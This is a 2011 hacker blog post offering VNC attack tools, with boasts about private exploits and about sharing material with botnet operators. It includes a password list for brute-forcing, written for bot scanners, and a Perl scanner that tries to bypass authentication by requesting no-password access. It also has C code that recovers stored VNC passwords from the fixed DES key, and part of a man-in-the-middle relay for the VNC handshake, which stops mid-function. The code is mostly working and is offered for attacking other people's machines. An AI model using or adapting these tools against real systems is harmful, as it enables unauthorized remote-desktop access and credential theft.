
Fun with VNCs – Some code which may be useful for you …

Posted on 7th December 2011 in Codes, Exploits, Papers

# OK well, I'll get right into it.
# The easiest bypass for VNC is the AUTH challenge code. OK, now open up some winvnc code (remember, most VNCs are
# actually based on this, or even on TightVNC code…); anyhow, in many versions you will find there is a part
# somewhere like this:

#define AUTH_CHALLENGE %s%s%s%s%s%s%s%s
#define CHALLENGE %s%s%s%s%s%s%s%s
#or:

#define AUTH_PWD %s%s%s%s%s%s%s%s

Depends on the code, so… OK, we have the simplest of buffer overflows: no boundary checks, because, well, look at it :s. Then in the code, it ONLY checks the auth on those 8 digits… OK, so for example, if you want to break VNC, you must know one thing… passwords can be longer or shorter, but you cannot bruteforce VNC with 100-password lists :P
you would be lucky to get 3 goes, so guess what your BEST password would be ??
123456789
simply add this into your scanner for rBot etc… and then maybe more… because the next b0f I cannot disclose, as it is actively exploitable still on ALL OSes, as the 8-digit one should still be on many… and I do test NEW corp releases etc. against the auth bypass which does a decrypt on the host; that's NOT disclosed, and people have called me crazy for even trying, but I have the code which says that's bs… and I showed some of this to the botting community… anyhow… the problem with most bruters is simply that they don't have an easy passlist… and believe me, the best is this list here:
123456789
1234
123
vnc
master
letmein
-> nomore than 6 passes,but these will always be good enough believe it…
OK so, the third section is simply to give you guys a few older codes… and maybe, if you're lucky enough, you will sometimes get chances to use them, using MY viewer, which does NULL auth bypass no problem. BUT, null is shitty, you want to decrypt ;) and, sorry, but that code is still pvt after 5yrs now…
Anyhow…moving on…

Some codes:

Perl scanner which is VERY good, but you might want some listings to better attack versions… :

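#!/usr/bin/perl
use strict;
use warnings;

# Expects one argument: the host (name or IP) whose RFB/VNC service on
# port 5900 will be probed.  All of the work happens in VNCScanner below.
my $target = shift @ARGV;
die "Usage: $0 <ip/host>\n" unless $target;
my $scanner = VNCScanner->new;
$scanner->scan($target);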
package VNCScanner;
use IO::Socket::INET;

# Constructor: an empty hash blessed into $class.  The socket and the
# RFB version numbers are filled in later by scan() and connect().
sub new {
    my $class = shift;
    return bless {}, $class;
}
# Accessor for the connected IO::Socket::INET (undef until scan() attaches one).
# socket() is kept as an alias so callers may use either name.
*socket = \&sock;
sub sock {
    my ($self) = @_;
    return $self->{sock};
}

# Open a TCP connection to $host on the fixed RFB port 5900 (VNC display
# :0 by convention; other displays are not probed) and, when it succeeds,
# hand the socket to connect() for the protocol handshake.  A connection
# failure is only warned about, not fatal, and the object is left without
# a socket.
sub scan {
    my ($self, $host) = @_;
    my $socket = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => '5900',
                                       Proto    => 'tcp',
                                       ) or warn "Error connecting to $host: $!\n";
    if ($socket && $socket->connected) {
        $self->{sock} = $socket;
        $self->connect;
    }
}

# Read the server's 12-byte ProtocolVersion banner ("RFB xxx.yyy\n"),
# record the major/minor numbers on the object and start the security
# handshake for RFB 3.x.  Any other banner is logged and the connection
# is left as it is.
sub connect {
    my $self = shift;
    my $socket = $self->sock;
    # read protocol version
    my $proto_v;
    $socket->read($proto_v, 12);   # NOTE(review): a short read is not retried, so $proto_v may be truncated
    $proto_v ||= '';               # read() leaves it undef on EOF/error
    chomp $proto_v;
    my ($maj_v, $min_v) = $proto_v =~ /RFB (\d+)\.(\d+)/;
    $self->{maj_v} = $maj_v;
    $self->{min_v} = $min_v;
    $self->log("Found RFB server ($maj_v.$min_v)");
    if ($maj_v == 3) {
        $self->auth;
    } elsif ($maj_v) {
        $self->log("Unknown RFB version $maj_v");
    } else {
        # banner did not match "RFB n.n" at all (or nothing was read)
        $self->log("Unknown RFB version response: $proto_v");
    }
}

# Security handshake for an RFB 3.x server.  With minor version >= 7 the
# client announces 3.7, reads the list of security types the server offers
# and then asks for type 1 (None) without checking that it was offered;
# the SecurityResult is read in check_auth_resp().  With an older server
# the client announces 3.3 and the server dictates a single type.
# Defender's view: a server that does not offer None should answer the
# request with a failed SecurityResult, so this probe is visible on the
# server as a failed handshake; disabling None and fronting VNC with an
# authenticated transport (TLS/VeNCrypt or an SSH tunnel) removes the
# case the probe is looking for.
sub auth {
    my $self = shift;
    my $sock = $self->sock;
    if ($self->{min_v} >= 7) {
        # do v. 7 auth
        $sock->print("RFB 003.007\n");                     ## this is type most UNiX use :P ~~ -xd
        # should receive 1 byte count of auth types
        my $sec_t_cnt;
        $sock->read($sec_t_cnt, 1);
        # NOTE(review): $sec_t_cnt is one raw byte, not a decimal string:
        # int() of it is 0 and a "\0" byte is still true, so neither the
        # test below nor the list read sees the count the server sent — verify.
        if ($sec_t_cnt) {
            # read array of auth types
            my $sec_t_array;
            $sock->read($sec_t_array, int($sec_t_cnt));
            # try auth bypass
            $sock->print(pack('C', 0x01)); # auth type none  NULL BYPASS here... but this is basic and crude -xd
            $self->check_auth_resp;
        } else {
            # a count of 0 is followed by a reason string:
            # 4-byte big-endian length, then the text
            my $err_str_len;
            $sock->read($err_str_len, 4);
            $err_str_len = unpack('N', $err_str_len) + 0;
            my $err_str;
            $sock->read($err_str, $err_str_len);
            $self->log("Got auth error: $err_str");
        }
    } else {
        # request version 3.3 auth
        $sock->print("RFB 003.003\n");
        # should get a type back: a 4-byte big-endian security type
        my $sec_t;
        $sock->read($sec_t, 4);
        $sec_t = unpack('N', $sec_t);
        unless ($sec_t) {
            # 0 = connection failed (server refused)
            $self->log("Auth rejected");
            return;
        }
        if ($sec_t == 1) {
            # no auth, yay
            $self->log("No auth required!");
        } else {
            # 2 = VNC Authentication (challenge/response); not attempted here
            $self->log("Auth type $sec_t requested. Giving up.");
        }
    }
}

# Read the 4-byte big-endian SecurityResult that follows the security-type
# choice.  0 means the server accepted (here: accepted type None, i.e. no
# password was required); anything else is a failure, after which a reason
# string is read and the socket closed.
# NOTE(review): the reason string after a failure is an RFB 3.8 addition;
# a 3.7 server may simply close the connection, in which case the two
# reads below return nothing — confirm against the servers of interest.
sub check_auth_resp {
    my $self = shift;
    my $sock = $self->sock;
    # read securityresult
    my $sec_res;
    $sock->read($sec_res, 4);
    $sec_res = unpack('N', $sec_res);
    if ($sec_res == 0) {
        # we're in!
        $self->log("Connected successfully!");
    } else {
        # read reason: 4-byte length, then the text
        my $err_str_len;
        $sock->read($err_str_len, 4);
        $err_str_len = unpack('N*', $err_str_len) + 0;
        my $err_str;
        $sock->read($err_str, $err_str_len);
        $self->log("Error in authentication: $err_str");
        # server will disconnect
        $sock->close;
    }
}

# Print one line of output prefixed with the peer address of the current
# socket (an empty prefix when no socket is attached).
sub log {
    my ($self, $msg) = @_;
    my $conn = $self->sock;
    my $prefix = '';
    if ($conn) {
        $prefix = $conn->peerhost;
    }
    print "[$prefix] $msg\n";
}

And now the best thing I think you might wanna play with… is decrypting the better VNCs ;)

Some .c code here I moved into the download pack also, so you can, like, fix it :P

/* VNC password decoder */
/* tested on Linux */
/* I take no credit */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define MAXPWLEN 8                       //---> haha w00ps we forgot to make auth only on the first 8 digits!
#define CHALLENGESIZE 16
#define EN0     0       /* MODE == encrypt */
#define DE1     1       /* MODE == decrypt */

/* Of these, only vncDecryptPasswd() and the d3des routines deskey/usekey/
 * cpkey/des are defined in this listing; the encrypt/random helpers are
 * declared but not provided here. */
extern int vncEncryptPasswd(char *passwd, char *fname);
extern char *vncDecryptPasswd(char *fname);
extern void vncRandomBytes(unsigned char *bytes);
extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);
extern void deskey(unsigned char *, int);
extern void usekey(unsigned long *);
extern void cpkey(unsigned long *);
extern void des(unsigned char *, unsigned char *);   // yea,ya want the d3des/rfb.h..or ya will never get this..

/* Constant DES key under which VNC servers store ("obfuscate") the
 * password.  Because the key is fixed and public, anyone who can read the
 * stored 8-byte block can recover the password, so the password file or
 * registry value must be protected exactly like a plaintext secret.  As
 * the author notes above, only the first MAXPWLEN (8) characters of a
 * longer password ever take part. */
unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7};   // and the char [8] fixed-key for all auths :)
                                                        // proof that the bug exists 100% -xd

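/* Decode one stored VNC password block and print it.
 * p[] holds the 8 obfuscated bytes as found in the server's password store
 * (the sample value is the author's).  Returns 0 on success, 1 when the
 * decoder could not allocate its result buffer. */
int main (void) {
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};   // change this..if you want to, if you know wtf ur doin -xd
char *clear = vncDecryptPasswd(p);

if (clear == NULL) {
    return 1;
}
printf("%8s\n", clear);
free(clear);   /* vncDecryptPasswd() hands back a malloc'd buffer */
return 0;
}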

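/* Decode an 8-byte stored VNC password block.
 * inouttext: the 8 obfuscated bytes (only the first 8 are read).
 * Returns a malloc'd, NUL-terminated buffer of up to 8 password characters
 * that the caller must free(), or NULL when malloc() fails.
 * The block is a single DES decryption under the published fixedkey, so
 * this is reversible obfuscation, not protection: treat the stored block
 * as equivalent to the password itself. */
char *vncDecryptPasswd(char *inouttext) {
    unsigned char *passwd = (unsigned char *)malloc(9);   /* 8 bytes + NUL */
    if (passwd == NULL) {
        return NULL;
    }
    deskey(fixedkey, DE1);                 /* schedule the fixed key for decryption */
    des((unsigned char *)inouttext, passwd);
    passwd[8] = 0;     //ohno...well look here...it only checks 8 password length afterall - passwd[8] = 0; -xd
    return (char *)passwd;
}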

static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);

/* Active key schedule: 32 words written by usekey(), copied out by cpkey()
 * and consumed by des()/desfunc().  KnR, Kn3 and Df_Key are not referenced
 * anywhere in the code shown here. */
static unsigned long KnL[32] = { 0L };
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
	0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
	0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
	0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };

/* Mask for bit m (0..7) of a key byte; deskey() indexes it with (l & 07). */
static unsigned short bytebit[8]	= { 01, 02, 04, 010, 020, 040, 0100, 0200 };

/* Single-bit masks for bits 23..0 of a 24-bit half subkey (see deskey()). */
static unsigned long bigbyte[24] = {
	0x800000L,	0x400000L,	0x200000L,	0x100000L,
	0x80000L,	0x40000L,	0x20000L,	0x10000L,
	0x8000L,	0x4000L,	0x2000L,	0x1000L,
	0x800L, 	0x400L, 	0x200L, 	0x100L,
	0x80L,		0x40L,		0x20L,		0x10L,
	0x8L,		0x4L,		0x2L,		0x1L	};

/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
/* pc1: permuted choice 1 (bit positions within the 64-bit key, parity
 * bits dropped); totrot: cumulative rotation per round; pc2: permuted
 * choice 2 (which of the 56 rotated bits form each 48-bit subkey). */
static unsigned char pc1[56] = {
	56, 48, 40, 32, 24, 16,  8,	 0, 57, 49, 41, 33, 25, 17,
	 9,  1, 58, 50, 42, 34, 26,	18, 10,  2, 59, 51, 43, 35,
	62, 54, 46, 38, 30, 22, 14,	 6, 61, 53, 45, 37, 29, 21,
	13,  5, 60, 52, 44, 36, 28,	20, 12,  4, 27, 19, 11,  3 };

static unsigned char totrot[16] = {
	1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };

static unsigned char pc2[48] = {
	13, 16, 10, 23,  0,  4,  2, 27, 14,  5, 20,  9,
	22, 18, 11,  3, 25,  7, 15,  6, 26, 19, 12,  1,
	40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
	43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };

/* Build the 16-round key schedule from an 8-byte key and install it as the
 * active schedule (via cookey() -> usekey()).
 * key: 8 key bytes; edf: EN0 for encryption, DE1 for decryption (the only
 * difference is that the subkeys are produced in reverse order). */
void deskey(unsigned char *key, int edf)
{
	unsigned char pc1m[56], pcr[56];
	unsigned long kn[32];
	int i, j;

	/* PC-1: pull the 56 key bits (parity bits dropped) out of the 8 key bytes. */
	for (j = 0; j < 56; j++) {
		int bit = pc1[j];
		pc1m[j] = (key[bit >> 3] & bytebit[bit & 07]) ? 1 : 0;
	}

	/* One 48-bit subkey (two 24-bit halves, kn[m] and kn[n]) per round. */
	for (i = 0; i < 16; i++) {
		int m = (edf == DE1) ? ((15 - i) << 1) : (i << 1);
		int n = m + 1;
		kn[m] = 0L;
		kn[n] = 0L;

		/* Rotate the two 28-bit halves independently by totrot[i]. */
		for (j = 0; j < 28; j++) {
			int l = j + totrot[i];
			pcr[j] = (l < 28) ? pc1m[l] : pc1m[l - 28];
		}
		for (j = 28; j < 56; j++) {
			int l = j + totrot[i];
			pcr[j] = (l < 56) ? pc1m[l] : pc1m[l - 28];
		}

		/* PC-2: select 48 of the 56 bits, 24 into each half. */
		for (j = 0; j < 24; j++) {
			if (pcr[pc2[j]])      kn[m] |= bigbyte[j];
			if (pcr[pc2[j + 24]]) kn[n] |= bigbyte[j];
		}
	}
	cookey(kn);
}

/* Rearrange the 32 raw 24-bit subkey halves into the bit layout that
 * desfunc() expects, then install the result with usekey().
 * raw1: 32 words, consumed in pairs (left half, right half) per round. */
static void cookey(unsigned long *raw1)
{
	unsigned long dough[32];
	int i;

	for (i = 0; i < 16; i++) {
		unsigned long left  = raw1[2 * i];
		unsigned long right = raw1[2 * i + 1];

		dough[2 * i]     = ((left  & 0x00fc0000L) << 6)
		                 | ((left  & 0x00000fc0L) << 10)
		                 | ((right & 0x00fc0000L) >> 10)
		                 | ((right & 0x00000fc0L) >> 6);
		dough[2 * i + 1] = ((left  & 0x0003f000L) << 12)
		                 | ((left  & 0x0000003fL) << 16)
		                 | ((right & 0x0003f000L) >> 4)
		                 |  (right & 0x0000003fL);
	}
	usekey(dough);
}

/* Copy the active key schedule (KnL, 32 words) out to `into`. */
void cpkey(unsigned long *into)
{
	int i;
	for (i = 0; i < 32; i++) {
		into[i] = KnL[i];
	}
}

/* Install a 32-word key schedule as the active one (KnL). */
void usekey(unsigned long *from)
{
	int i;
	for (i = 0; i < 32; i++) {
		KnL[i] = from[i];
	}
}

/* Run one 8-byte block through DES with the active schedule: pack the
 * input bytes into two 32-bit halves, apply desfunc(), unpack the result
 * into outblock.  Whether this encrypts or decrypts depends only on the
 * schedule deskey() installed. */
void des(unsigned char *inblock, unsigned char *outblock)
{
	unsigned long halves[2];

	scrunch(inblock, halves);
	desfunc(halves, KnL);
	unscrun(halves, outblock);
}

/* Pack 8 bytes into two big-endian 32-bit words: into[0] from bytes 0..3,
 * into[1] from bytes 4..7. */
static void scrunch(unsigned char *outof, unsigned long *into)
{
	int w;

	for (w = 0; w < 2; w++) {
		unsigned long word = 0;
		int b;
		for (b = 0; b < 4; b++) {
			word = (word << 8) | (unsigned long)(outof[4 * w + b] & 0xff);
		}
		into[w] = word;
	}
}

/* Unpack two 32-bit words into 8 bytes, most significant byte first:
 * outof[0] -> into[0..3], outof[1] -> into[4..7]. */
static void unscrun(unsigned long *outof, unsigned char *into)
{
	int w;

	for (w = 0; w < 2; w++) {
		int b;
		for (b = 0; b < 4; b++) {
			into[4 * w + b] = (unsigned char)((outof[w] >> (24 - 8 * b)) & 0xffL);
		}
	}
}

/* S-box lookup tables with the P permutation folded in (SP1..SP8).
 * desfunc() indexes each table with one 6-bit group of the key-mixed
 * half block (its `& 0x3fL` selections) and ORs the eight results
 * together, so every entry already carries its bits in final position. */
static unsigned long SP1[64] = {
	0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
	0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
	0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
	0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
	0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
	0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
	0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
	0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
	0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
	0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
	0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
	0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
	0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
	0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };

static unsigned long SP2[64] = {
	0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
	0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
	0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
	0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
	0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
	0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
	0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
	0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
	0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
	0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
	0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
	0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
	0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
	0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
	0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
	0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };

static unsigned long SP3[64] = {
	0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
	0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
	0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
	0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
	0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
	0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
	0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
	0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
	0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
	0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
	0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
	0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
	0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
	0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
	0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
	0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };

static unsigned long SP4[64] = {
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
	0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
	0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
	0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
	0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
	0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
	0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
	0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
	0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };

static unsigned long SP5[64] = {
	0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
	0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
	0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
	0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
	0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
	0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
	0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
	0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
	0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
	0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
	0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
	0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
	0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
	0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
	0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
	0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };

static unsigned long SP6[64] = {
	0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
	0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
	0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
	0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
	0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
	0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
	0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
	0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
	0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
	0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
	0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
	0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
	0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
	0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };

static unsigned long SP7[64] = {
	0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
	0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
	0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
	0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
	0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
	0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
	0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
	0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
	0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
	0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
	0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
	0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
	0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
	0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
	0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
	0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };

static unsigned long SP8[64] = {
	0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
	0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
	0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
	0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
	0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
	0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
	0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
	0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
	0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
	0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
	0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
	0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
	0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
	0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
	0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
	0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };

/* One DES block operation on block[0] (left half) and block[1] (right half)
 * with the 32-word schedule in keys.  The swap sequence before the loop
 * appears to be the initial permutation done as bit-group exchanges; the
 * loop performs two Feistel rounds per iteration (16 rounds, four schedule
 * words per iteration, all 32 consumed); the swaps after it undo the
 * permutation.  Encrypt vs decrypt is decided only by the subkey order
 * that deskey() produced, not here.  The halves are written back swapped
 * (right first, then left).  Masking with 0xffffffffL keeps the halves to
 * 32 bits where unsigned long is wider. */
static void desfunc(block, keys)
register unsigned long *block, *keys;
{
	register unsigned long fval, work, right, leftt;
	register int round;
	leftt = block[0];
	right = block[1];
	/* initial permutation (bit-group exchanges) */
	work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
	right ^= work;
	leftt ^= (work << 4);
	work = ((leftt >> 16) ^ right) & 0x0000ffffL;
	right ^= work;
	leftt ^= (work << 16);
	work = ((right >> 2) ^ leftt) & 0x33333333L;
	leftt ^= work;
	right ^= (work << 2);
	work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
	leftt ^= work;
	right ^= (work << 8);
	right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = ((leftt << 1) | ((leftt>>31) & 1L)) & 0xffffffffL;
	/* 8 iterations x 2 rounds; each round mixes two key words and looks up
	 * eight 6-bit groups in the SP tables */
	for( round = 0; round < 8; round++ ) {
		work  = (right<<28) | (right>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work>>8) & 0x3fL];
		fval |= SP3[(work>>16) & 0x3fL];
		fval |= SP1[(work>>24) & 0x3fL];
		work  = right ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work>>8) & 0x3fL];
		fval |= SP4[(work>>16) & 0x3fL];
		fval |= SP2[(work>>24) & 0x3fL];
		leftt ^= fval;
		work  = (leftt << 28) | (leftt>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work >>  8) & 0x3fL];
		fval |= SP3[(work >> 16) & 0x3fL];
		fval |= SP1[(work >> 24) & 0x3fL];
		work  = leftt ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work >>  8) & 0x3fL];
		fval |= SP4[(work >> 16) & 0x3fL];
		fval |= SP2[(work >> 24) & 0x3fL];
		right ^= fval;
		}
	/* final permutation (inverse of the exchanges above) */
	right = (right << 31) | (right >> 1);
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = (leftt << 31) | (leftt >> 1);
	work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
	right ^= work;
	leftt ^= (work << 8);
	work = ((leftt >> 2) ^ right) & 0x33333333L;
	right ^= work;
	leftt ^= (work << 2);
	work = ((right >> 16) ^ leftt) & 0x0000ffffL;
	leftt ^= work;
	right ^= (work << 16);
	work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
	leftt ^= work;
	right ^= (work << 4);
	*block++ = right;
	*block = leftt;
	return;
	}

hehe, that's basically how a standard decryptor works, so, spot that 8-digit bug yet?? lol… believe me, use it!

now… one more code, and that's IT! THIS is a different method… VNC MiTM attack! yea bitches… watch out!

#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Port used both for the listener that faces the client and for the
 * connection to the upstream server. */
#define VNCPORT 5900
/* Placeholder address of the upstream (real) VNC server. */
#define VNCSERVER "x.x.x.x"  // enter ya fakey here :P  this only is for, making it exec,
                             // look at bottom where it shows how todo this..
#define QUEUE 8
/* NOTE(review): BUFSIZ is also a macro in <stdio.h>, which this file does
 * not include although it calls printf()/perror(); whether the
 * redefinition is accepted depends on the toolchain — confirm. */
#define BUFSIZ 512

/* 12 bytes of "RFB xxx.yyy\n" plus a NUL; not used by main() below. */
typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12

/* Relay for the RFB 3.3 "VNC Authentication" handshake.  It listens on
 * VNCPORT as if it were a VNC server, connects to VNCSERVER as an ordinary
 * client, and passes the server's 16-byte challenge and the client's
 * 16-byte response through unchanged.  The 3.3 handshake carries nothing
 * that lets the client check which server issued the challenge, which is
 * why a relay in the path works; the mitigation is an authenticated
 * transport (TLS/VeNCrypt, or VNC over an SSH tunnel), not a stronger
 * password.  One client is served, then all three sockets are closed. */
int main (int argc, char **argv) {
int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);   /* listens on every interface */
server.sin_port = htons (VNCPORT);
/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server, sizeof (server)) == -1) {
perror ("bind");
exit (-1);
}
listen (sockfd, QUEUE);
if ((clientfd = accept (sockfd,(struct sockaddr *) &client, &len)) == -1) {
perror ("accept");
exit (-1);
}
/* Client side: behave like an RFB 3.3 server. */
strcpy (buf, "RFB 003.003\n");
/* we must send VNC version number (from proto) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
buf [nbytes] = 0;
printf ("[VNC Version] -> %s\n", buf);
/* 4-byte big-endian 2 = security type "VNC Authentication" */
buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
